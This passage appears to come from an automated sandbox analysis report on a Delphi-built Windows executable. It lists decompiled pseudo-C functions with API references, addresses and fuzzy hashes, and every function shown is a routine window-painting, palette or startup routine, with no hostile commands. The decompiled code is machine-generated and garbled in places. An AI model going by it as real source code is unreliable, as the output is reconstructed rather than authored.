Part of subcall function 0043B364: SendMessageA.USER32 ref: 0043B380

SendMessageA.USER32 ref: 0043B5C5
SendMessageA.USER32 ref: 0043B615

Part of subcall function 0043B390: SendMessageA.USER32 ref: 0043B3D1
Part of subcall function 0043B390: SendMessageA.USER32 ref: 0043B3FD
Part of subcall function 0043B390: SendMessageA.USER32 ref: 0043B431

PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0043B75D
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 0043B7AA

Part of subcall function 0043A38C: SendMessageA.USER32 ref: 0043A3A0

Part of subcall function 0043A3B0: SendMessageA.USER32 ref: 0043A3CD
Part of subcall function 0043A3B0: InvalidateRect.USER32(00000000,000000FF,000000FF), ref: 0043A3EA

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Send$CountPeekTick$InvalidateRect
String ID:
API String ID: 2065907832-0
Opcode ID: db388b5323bf4f57661620b637374c898872ee8102304ca0f6d703f0bdadae47
Instruction ID: d127a3ff5eb7745ad22c338c3887c7f9bc26e366bcf883f0e0a0d6bea00676aa
Opcode Fuzzy Hash: db388b5323bf4f57661620b637374c898872ee8102304ca0f6d703f0bdadae47
Instruction Fuzzy Hash: 75B16270A04108EBDF10EBA5C986BDDB3B5EF49308F2454B6E500BB392D738AE05DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00460EE0, Relevance: 9.2, APIs: 6, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00460EE0(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				struct HDC__* _v16;
				struct tagPAINTSTRUCT _v80;
				struct tagRECT _v96;
				struct tagRECT _v112;
				signed int _v116;
				long _v120;
				void* __ebp;
				void* _t68;
				void* _t94;
				struct HBRUSH__* _t97;
				intOrPtr _t105;
				void* _t118;
				void* _t127;
				intOrPtr _t140;
				intOrPtr _t146;
				void* _t147;
				void* _t148;
				void* _t150;
				void* _t152;
				intOrPtr _t153;

				_t148 = __esi;
				_t147 = __edi;
				_t138 = __edx;
				_t127 = __ebx;
				_t150 = _t152;
				_t153 = _t152 + 0xffffff8c;
				_v12 = __edx;
				_v8 = __eax;
				_t68 =  *_v12 - 0xf;
				if(_t68 == 0) {
					_v16 =  *(_v12 + 4);
					if(_v16 == 0) {
						 *(_v12 + 4) = BeginPaint( *(_v8 + 0x254),  &_v80);
					}
					_push(_t150);
					_push(0x4610ae);
					_push( *[fs:eax]);
					 *[fs:eax] = _t153;
					if(_v16 == 0) {
						GetWindowRect( *(_v8 + 0x254),  &_v96);
						E00446888(_v8,  &_v120,  &_v96);
						_v96.left = _v120;
						_v96.top = _v116;
						E00445658( *(_v12 + 4),  ~(_v96.top),  ~(_v96.left));
					}
					E0044B244(_v8, _t127, _v12, _t147, _t148);
					_pop(_t140);
					 *[fs:eax] = _t140;
					_push(0x4610bc);
					if(_v16 == 0) {
						return EndPaint( *(_v8 + 0x254),  &_v80);
					}
					return 0;
				} else {
					_t94 = _t68 - 5;
					if(_t94 == 0) {
						_t97 = E00428C98( *((intOrPtr*)(_v8 + 0x170)));
						 *((intOrPtr*)( *_v8 + 0x44))();
						FillRect( *(_v12 + 4),  &_v112, _t97);
						if( *((char*)(_v8 + 0x22f)) == 2 &&  *(_v8 + 0x254) != 0) {
							GetClientRect( *(_v8 + 0x254),  &_v96);
							FillRect( *(_v12 + 4),  &_v96, E00428C98( *((intOrPtr*)(_v8 + 0x170))));
						}
						_t105 = _v12;
						 *((intOrPtr*)(_t105 + 0xc)) = 1;
					} else {
						_t118 = _t94 - 0x2b;
						if(_t118 == 0) {
							E00460E54(_t150);
							_t105 = _v8;
							if( *((char*)(_t105 + 0x22f)) == 2) {
								if(E0046137C(_v8) == 0 || E00460EA0(_t138, _t150) == 0) {
									_t146 = 1;
								} else {
									_t146 = 0;
								}
								_t105 = E0045E168( *(_v8 + 0x254), _t146);
							}
						} else {
							if(_t118 != 0x45) {
								_t105 = E00460E54(_t150);
							} else {
								E00460E54(_t150);
								_t105 = _v12;
								if( *((intOrPtr*)(_t105 + 0xc)) == 1) {
									_t105 = _v12;
									 *((intOrPtr*)(_t105 + 0xc)) = 0xffffffff;
								}
							}
						}
					}
					return _t105;
				}
			}

0x00460ee0
0x00460ee0
0x00460ee0
0x00460ee0
0x00460ee1
0x00460ee3
0x00460ee6
0x00460ee9
0x00460ef1
0x00460ef4
0x00461004
0x0046100b
0x00461023
0x00461023
0x00461028
0x00461029
0x0046102e
0x00461031
0x00461038
0x00461048
0x00461056
0x0046105e
0x00461064
0x00461077
0x00461077
0x00461082
0x00461089
0x0046108c
0x0046108f
0x00461098
0x00000000
0x004610a8
0x004610ad
0x00460efa
0x00460efa
0x00460efd
0x00460f3d
0x00460f4b
0x00460f59
0x00460f68
0x00460f84
0x00460fa3
0x00460fa3
0x00460fa8
0x00460fab
0x00460eff
0x00460eff
0x00460f02
0x00460fb8
0x00460fbe
0x00460fc8
0x00460fd8
0x00460fe9
0x00460fe5
0x00460fe5
0x00460fe5
0x00460ff4
0x00460ff4
0x00460f08
0x00460f0b
0x004610b6
0x00460f11
0x00460f12
0x00460f18
0x00460f1f
0x00460f25
0x00460f28
0x00460f28
0x00460f1f
0x00460f0b
0x00460f02
0x004610bf
0x004610bf

APIs

FillRect.USER32(?,?), ref: 00460F59
GetClientRect.USER32 ref: 00460F84
FillRect.USER32(?,?,00000000), ref: 00460FA3

Part of subcall function 00460E54: CallWindowProcA.USER32(?,?,?,?,?), ref: 00460E8E

BeginPaint.USER32(?,?), ref: 0046101B
GetWindowRect.USER32 ref: 00461048
EndPaint.USER32(?,?), ref: 004610A8

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$FillPaintWindow$BeginCallClientProc
String ID:
API String ID: 901200654-0
Opcode ID: daa94e52ecbd2a872ef6d1a8278fdbad5f14159e53a9ff2b2f1c986726e241d7
Instruction ID: 27c55b74c290ca9de160857cf78199b3a46fbd1b5bcb37aa3b833d0e0a1a7686
Opcode Fuzzy Hash: daa94e52ecbd2a872ef6d1a8278fdbad5f14159e53a9ff2b2f1c986726e241d7
Instruction Fuzzy Hash: 9B511E74D04248EFCB14DBA9C589E9EB7F4AF08314F1481AAF408E7751D739AE45CB19

Uniqueness

Uniqueness Score: -1.00%

Function 0049CCC8, Relevance: 9.1, APIs: 6, Instructions: 93
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0049CCC8(void* __eax, void* __ecx, void* __edi, void* __eflags) {
				void* _t26;
				void* _t31;
				int _t37;
				int _t40;
				void* _t44;
				void* _t49;
				int _t56;
				void* _t60;
				void* _t65;

				_t60 = __eax;
				E00428D80( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x160)) + 0x14)), __ecx, 0, __edi, _t65, __eflags);
				E0042897C( *((intOrPtr*)( *((intOrPtr*)(_t60 + 0x160)) + 0x10)), __ecx,  *((intOrPtr*)(E0049B330(E0049CF70(_t60), __eflags) + 0x70)), __edi, _t65);
				_t26 =  *((intOrPtr*)(E0049CF70(_t60) + 0x227)) - 2;
				if(_t26 >= 0) {
					_t44 = _t26 - 2;
					if(_t44 < 0) {
						PatBlt(E004294DC( *((intOrPtr*)(_t60 + 0x160))), 0, 0, 2, 6, 0x5a0049);
						_t49 = E00446748(_t60);
						PatBlt(E004294DC( *((intOrPtr*)(_t60 + 0x160))), 2, 2, _t49 - 6, 2, 0x5a0049);
						_t56 = E00446748(_t60) - 4;
						__eflags = _t56;
						return PatBlt(E004294DC( *((intOrPtr*)(_t60 + 0x160))), _t56, 0, 2, 6, 0x5a0049);
					}
					return _t44;
				}
				PatBlt(E004294DC( *((intOrPtr*)(_t60 + 0x160))), 0, 0, 6, 2, 0x5a0049);
				_t31 = E0044678C(_t60);
				PatBlt(E004294DC( *((intOrPtr*)(_t60 + 0x160))), 2, 2, 2, _t31 - 4, 0x5a0049);
				_t37 = E0044678C(_t60);
				_t40 = E0044678C(_t60) - 2;
				__eflags = _t40;
				return PatBlt(E004294DC( *((intOrPtr*)(_t60 + 0x160))), 0, _t40, 6, _t37, 0x5a0049);
			}

0x0049ccc9
0x0049ccd6
0x0049ccf3
0x0049cd05
0x0049cd07
0x0049cd09
0x0049cd0b
0x0049cd9f
0x0049cdad
0x0049cdc6
0x0049cddd
0x0049cddd
0x00000000
0x0049cded
0x00000000
0x0049cd0b
0x0049cd2b
0x0049cd37
0x0049cd52
0x0049cd5e
0x0049cd6d
0x0049cd6d
0x0049cd85

APIs

PatBlt.GDI32(00000000,00000000,00000000,00000006,00000002,005A0049), ref: 0049CD2B
PatBlt.GDI32(00000000,00000002,00000002,00000002,-00000004,005A0049), ref: 0049CD52
PatBlt.GDI32(00000000,00000000,-00000002,00000006,00000000,005A0049), ref: 0049CD7F
PatBlt.GDI32(00000000,00000000,00000000,00000002,00000006,005A0049), ref: 0049CD9F
PatBlt.GDI32(00000000,00000002,00000002,-00000006,00000002,005A0049), ref: 0049CDC6
PatBlt.GDI32(00000000,-00000004,00000000,00000002,00000006,005A0049), ref: 0049CDED

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5383e84f9b8d3d2b900de6305c8fa764a65810f25d42724baedf77359a2c569c
Instruction ID: 94e61b4787a8b36ce3a46e24696fbe29ce099cad82eed1c8396a8660375b19cd
Opcode Fuzzy Hash: 5383e84f9b8d3d2b900de6305c8fa764a65810f25d42724baedf77359a2c569c
Instruction Fuzzy Hash: 5E213E647943007BEA10BB7ADC8BF5B1A496B05B08F85547ABA05FF1D7C9BEDC014268

Uniqueness

Uniqueness Score: -1.00%

Function 0042A328, Relevance: 9.1, APIs: 6, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E0042A328(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, signed int* _a4, signed int* _a8) {
				intOrPtr* _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v32;
				struct HDC__* _v44;
				signed int* _t36;
				signed int _t39;
				signed int _t42;
				signed int* _t52;
				signed int _t56;
				intOrPtr _t66;
				void* _t72;
				void* _t73;
				void* _t74;
				intOrPtr _t75;

				_t73 = _t74;
				_t75 = _t74 + 0xffffff8c;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_t52 = _a8;
				_v24 = _v16 << 4;
				_v20 = E004087C4(_v24, __ecx, __edx, __eflags);
				 *[fs:edx] = _t75;
				_t56 = _v24;
				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:edx], 0x42a62a, _t73, __edi, __esi, __ebx, _t72);
				if(( *_t52 | _t52[1]) != 0) {
					_t36 = _a4;
					 *_t36 =  *_t52;
					_t36[1] = _t52[1];
				} else {
					 *_a4 = GetSystemMetrics(0xb);
					_a4[1] = GetSystemMetrics(0xc);
				}
				_v44 = GetDC(0);
				if(_v44 == 0) {
					E004297D8(_t56);
				}
				_push(_t73);
				_push(0x42a411);
				_push( *[fs:edx]);
				 *[fs:edx] = _t75;
				_t39 = GetDeviceCaps(_v44, 0xe);
				_t42 = _t39 * GetDeviceCaps(_v44, 0xc);
				if(_t42 <= 8) {
					__eflags = 1;
					_v32 = 1 << _t42;
				} else {
					_v32 = 0x7fffffff;
				}
				_pop(_t66);
				 *[fs:eax] = _t66;
				_push(0x42a418);
				return ReleaseDC(0, _v44);
			}

0x0042a329
0x0042a32b
0x0042a331
0x0042a334
0x0042a337
0x0042a33a
0x0042a343
0x0042a34e
0x0042a35c
0x0042a362
0x0042a36a
0x0042a372
0x0042a38f
0x0042a394
0x0042a399
0x0042a374
0x0042a37e
0x0042a38a
0x0042a38a
0x0042a3a3
0x0042a3aa
0x0042a3ac
0x0042a3ac
0x0042a3b3
0x0042a3b4
0x0042a3b9
0x0042a3bc
0x0042a3c5
0x0042a3db
0x0042a3e1
0x0042a3f3
0x0042a3f5
0x0042a3e3
0x0042a3e3
0x0042a3e3
0x0042a3fa
0x0042a3fd
0x0042a400
0x0042a410

APIs

GetSystemMetrics.USER32 ref: 0042A376
GetSystemMetrics.USER32 ref: 0042A382
GetDC.USER32(00000000), ref: 0042A39E
GetDeviceCaps.GDI32(00000000,0000000E), ref: 0042A3C5
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042A3D2
ReleaseDC.USER32(00000000,00000000), ref: 0042A40B

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDeviceMetricsSystem$Release
String ID:
API String ID: 447804332-0
Opcode ID: e77851f6ed4db6b595f3bdff75b5207152b3204487869f168d846c86834e3117
Instruction ID: 6bca1dfe9d5afdfc81d0abec7de6f1c846dd1943806f55e8eb55875c6f2e7381
Opcode Fuzzy Hash: e77851f6ed4db6b595f3bdff75b5207152b3204487869f168d846c86834e3117
Instruction Fuzzy Hash: F7318470B00254DFDB00EF95C841AAEBBB5FF49710F50816AFC14AB381C674AD51CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 0042A7B4, Relevance: 9.1, APIs: 6, Instructions: 65
windowCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E0042A7B4(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, struct HPALETTE__* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
				char _v5;
				struct HPALETTE__* _v12;
				struct HDC__* _v16;
				struct tagBITMAPINFO* _t36;
				intOrPtr _t43;
				struct HBITMAP__* _t47;
				void* _t50;

				_t36 = __ecx;
				_t47 = __eax;
				E0042A664(__eax, _a4, __ecx);
				_v12 = 0;
				_v16 = CreateCompatibleDC(0);
				_push(_t50);
				_push(0x42a851);
				_push( *[fs:eax]);
				 *[fs:eax] = _t50 + 0xfffffff4;
				if(__edx != 0) {
					_v12 = SelectPalette(_v16, __edx, 0);
					RealizePalette(_v16);
				}
				_v5 = GetDIBits(_v16, _t47, 0, _t36->bmiHeader.biHeight, _a8, _t36, 0) != 0;
				_pop(_t43);
				 *[fs:eax] = _t43;
				_push(0x42a858);
				if(_v12 != 0) {
					SelectPalette(_v16, _v12, 0);
				}
				return DeleteDC(_v16);
			}

0x0042a7bd
0x0042a7c1
0x0042a7ca
0x0042a7d1
0x0042a7db
0x0042a7e0
0x0042a7e1
0x0042a7e6
0x0042a7e9
0x0042a7ee
0x0042a7fc
0x0042a803
0x0042a803
0x0042a821
0x0042a827
0x0042a82a
0x0042a82d
0x0042a836
0x0042a842
0x0042a842
0x0042a850

APIs

Part of subcall function 0042A664: GetObjectA.GDI32(?,00000054), ref: 0042A678

CreateCompatibleDC.GDI32(00000000), ref: 0042A7D6
SelectPalette.GDI32(?,?,00000000), ref: 0042A7F7
RealizePalette.GDI32(?), ref: 0042A803
GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0042A81A
SelectPalette.GDI32(?,00000000,00000000), ref: 0042A842
DeleteDC.GDI32(?), ref: 0042A84B

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Palette$Select$BitsCompatibleCreateDeleteObjectRealize
String ID:
API String ID: 1221726059-0
Opcode ID: 148b2893d1fac504bc4ce105bcd762a593a417b457847206cb32babcb09c190e
Instruction ID: 401f90ed770cec6a06f9266caed29e2ddd585762a0c57216d006dd8419cd5f3d
Opcode Fuzzy Hash: 148b2893d1fac504bc4ce105bcd762a593a417b457847206cb32babcb09c190e
Instruction Fuzzy Hash: 04114F75B002047FDB11EBA9DC81F5EB7FCEF88700F51806AB914E7281D67899108B69

Uniqueness

Uniqueness Score: -1.00%

Function 00443A9C, Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00443A9C(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* _t20;
				void* _t21;
				void* _t27;
				void* _t31;
				void* _t35;
				intOrPtr* _t43;

				_t43 =  &_v8;
				_t20 =  *0x4a0ce8; // 0x0
				 *((intOrPtr*)(_t20 + 0x180)) = _a4;
				_t21 =  *0x4a0ce8; // 0x0
				SetWindowLongA(_a4, 0xfffffffc,  *(_t21 + 0x18c));
				if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) {
					SetWindowLongA(_a4, 0xfffffff4, _a4);
				}
				_t27 =  *0x4a0ce8; // 0x0
				SetPropA(_a4,  *0x4bcaea & 0x0000ffff, _t27);
				_t31 =  *0x4a0ce8; // 0x0
				SetPropA(_a4,  *0x4bcae8 & 0x0000ffff, _t31);
				_t35 =  *0x4a0ce8; // 0x0
				 *0x4a0ce8 = 0;
				_v8 =  *((intOrPtr*)(_t35 + 0x18c))(_a4, _a8, _a12, _a16);
				return  *_t43;
			}

0x00443aa1
0x00443aa4
0x00443aac
0x00443ab2
0x00443ac4
0x00443ad9
0x00443af4
0x00443af4
0x00443af9
0x00443b0b
0x00443b10
0x00443b22
0x00443b33
0x00443b38
0x00443b48
0x00443b50

APIs

SetWindowLongA.USER32 ref: 00443AC4
GetWindowLongA.USER32(?,000000F0), ref: 00443ACF
GetWindowLongA.USER32(?,000000F4), ref: 00443AE1
SetWindowLongA.USER32 ref: 00443AF4
SetPropA.USER32(?,00000000,00000000), ref: 00443B0B
SetPropA.USER32(?,00000000,00000000), ref: 00443B22

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: LongWindow$Prop
String ID:
API String ID: 3887896539-0
Opcode ID: dd5c66f0e5966027bebf58dbf438d66112e0852b6d0784a23f97aebe89105b78
Instruction ID: 18f268816a8d585fe9b3e4a48a7a3d1cce598fe18381e1b14f7a4e98008e497b
Opcode Fuzzy Hash: dd5c66f0e5966027bebf58dbf438d66112e0852b6d0784a23f97aebe89105b78
Instruction Fuzzy Hash: 18111275504204BFDF40DF9DDC84EDA3BA8BB09364F104225F918D7291D734EA40CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00429FD0, Relevance: 9.1, APIs: 6, Instructions: 55
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00429FD0(void* __eax, signed int __ecx) {
				char _v1036;
				signed int _v1038;
				struct tagRGBQUAD _v1048;
				short _v1066;
				void* _t20;
				struct HDC__* _t25;
				void* _t28;
				void* _t31;
				struct HPALETTE__* _t33;
				LOGPALETTE* _t34;

				_t31 = __eax;
				_t33 = 0;
				_t34->palVersion = 0x300;
				if(__eax == 0) {
					_v1038 = __ecx;
					E00402D04(_t28, __ecx << 2,  &_v1036);
				} else {
					_t25 = CreateCompatibleDC(0);
					_t20 = SelectObject(_t25, _t31);
					_v1066 = GetDIBColorTable(_t25, 0, 0x100,  &_v1048);
					SelectObject(_t25, _t20);
					DeleteDC(_t25);
				}
				if(_v1038 != 0) {
					if(_v1038 != 0x10 || E00429F38(_t34) == 0) {
						E00429DC8( &_v1036, _v1038 & 0x0000ffff);
					}
					_t33 = CreatePalette(_t34);
				}
				return _t33;
			}

0x00429fd9
0x00429fdb
0x00429fdd
0x00429fe5
0x0042a01f
0x0042a02d
0x00429fe7
0x00429fee
0x00429ff2
0x0042a00b
0x0042a012
0x0042a018
0x0042a018
0x0042a038
0x0042a040
0x0042a056
0x0042a056
0x0042a063
0x0042a063
0x0042a070

APIs

CreateCompatibleDC.GDI32(00000000), ref: 00429FE9
SelectObject.GDI32(00000000,00000000), ref: 00429FF2
GetDIBColorTable.GDI32(00000000,00000000,00000100,?), ref: 0042A006
SelectObject.GDI32(00000000,00000000), ref: 0042A012
DeleteDC.GDI32(00000000), ref: 0042A018
CreatePalette.GDI32 ref: 0042A05E

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateObjectSelect$ColorCompatibleDeletePaletteTable
String ID:
API String ID: 2515223848-0
Opcode ID: cb05b583d79fa0232cad0e2b1ec02a06926908cf28c26fa39e8cd081a778448b
Instruction ID: 34ab66e0089e6405cb177bb4262cc9b5e62266bcaa3fc7cef4ba08948bb38239
Opcode Fuzzy Hash: cb05b583d79fa0232cad0e2b1ec02a06926908cf28c26fa39e8cd081a778448b
Instruction Fuzzy Hash: E201966130432062E2147B2AAC47E9B72B89FC0758F45C82FF689A72C2E67D8C54835F

Uniqueness

Uniqueness Score: -1.00%

Function 004296A8, Relevance: 9.0, APIs: 6, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004296A8(void* __eax) {
				void* _t36;

				_t36 = __eax;
				UnrealizeObject(E00428C98( *((intOrPtr*)(__eax + 0x14))));
				SelectObject( *(_t36 + 4), E00428C98( *((intOrPtr*)(_t36 + 0x14))));
				if(E00428D78( *((intOrPtr*)(_t36 + 0x14))) != 0) {
					SetBkColor( *(_t36 + 4),  !(E00427FD0(E00428C5C( *((intOrPtr*)(_t36 + 0x14))))));
					return SetBkMode( *(_t36 + 4), 1);
				} else {
					SetBkColor( *(_t36 + 4), E00427FD0(E00428C5C( *((intOrPtr*)(_t36 + 0x14)))));
					return SetBkMode( *(_t36 + 4), 2);
				}
			}

0x004296a9
0x004296b4
0x004296c6
0x004296d5
0x0042970f
0x00429720
0x004296d7
0x004296e9
0x004296fa
0x004296fa

APIs

Part of subcall function 00428C98: CreateBrushIndirect.GDI32(?), ref: 00428D42

UnrealizeObject.GDI32(00000000), ref: 004296B4
SelectObject.GDI32(?,00000000), ref: 004296C6
SetBkColor.GDI32(?,00000000), ref: 004296E9
SetBkMode.GDI32(?,00000002), ref: 004296F4
SetBkColor.GDI32(?,00000000), ref: 0042970F
SetBkMode.GDI32(?,00000001), ref: 0042971A

Part of subcall function 00427FD0: GetSysColor.USER32 ref: 00427FDA

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
String ID:
API String ID: 3527656728-0
Opcode ID: 0bf8573a89cf84b3894dff50b431fb09bcc409200c45980c22251b11ead8d36f
Instruction ID: 7383a5b9a6f387790e679a2e21ac38346014704ba7f38b963da7a20ea28431a8
Opcode Fuzzy Hash: 0bf8573a89cf84b3894dff50b431fb09bcc409200c45980c22251b11ead8d36f
Instruction Fuzzy Hash: DCF0BBB17051119BDE00FFBAEAC6D1B2BD89F08309741449AF909EF19BCA7DD8104B39

Uniqueness

Uniqueness Score: -1.00%

Function 0040668D, Relevance: 9.0, APIs: 6, Instructions: 41
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040668D(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
				long _t11;
				void* _t16;

				_t16 = __ebx;
				 *__edi =  *__edi + __ecx;
				 *((intOrPtr*)(__eax - 0x4bc5bc)) =  *((intOrPtr*)(__eax - 0x4bc5bc)) + __eax - 0x4bc5bc;
				 *0x4a0008 = 2;
				 *0x4bc014 = 0x4012b8;
				 *0x4bc018 = 0x4012c0;
				 *0x4bc04e = 2;
				 *0x4bc000 = E00405228;
				if(E00403448() != 0) {
					_t3 = E00403478();
				}
				E0040353C(_t3);
				 *0x4bc054 = 0xd7b0;
				 *0x4bc220 = 0xd7b0;
				 *0x4bc3ec = 0xd7b0;
				 *0x4bc040 = GetCommandLineA();
				 *0x4bc03c = E004013C8();
				if((GetVersion() & 0x80000000) == 0x80000000) {
					 *0x4bc5c0 = E004065C4(GetThreadLocale(), _t16, __eflags);
				} else {
					if((GetVersion() & 0x000000ff) <= 4) {
						 *0x4bc5c0 = E004065C4(GetThreadLocale(), _t16, __eflags);
					} else {
						 *0x4bc5c0 = 3;
					}
				}
				_t11 = GetCurrentThreadId();
				 *0x4bc034 = _t11;
				return _t11;
			}

0x0040668d
0x00406692
0x00406697
0x00406699
0x004066a0
0x004066aa
0x004066b4
0x004066bb
0x004066cc
0x004066ce
0x004066ce
0x004066d3
0x004066d8
0x004066e1
0x004066ea
0x004066f8
0x00406702
0x00406716
0x0040674f
0x00406718
0x00406726
0x0040673e
0x00406728
0x00406728
0x00406728
0x00406726
0x00406754
0x00406759
0x0040675e

APIs

Part of subcall function 00403448: GetKeyboardType.USER32 ref: 0040344D
Part of subcall function 00403448: GetKeyboardType.USER32 ref: 00403459

GetCommandLineA.KERNEL32 ref: 004066F3
GetVersion.KERNEL32 ref: 00406707
GetVersion.KERNEL32 ref: 00406718
GetCurrentThreadId.KERNEL32 ref: 00406754

Part of subcall function 00403478: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040349A
Part of subcall function 00403478: RegQueryValueExA.ADVAPI32 ref: 004034CD
Part of subcall function 00403478: RegCloseKey.ADVAPI32(?), ref: 004034E3

GetThreadLocale.KERNEL32 ref: 00406734

Part of subcall function 004065C4: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040662A), ref: 004065EA

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
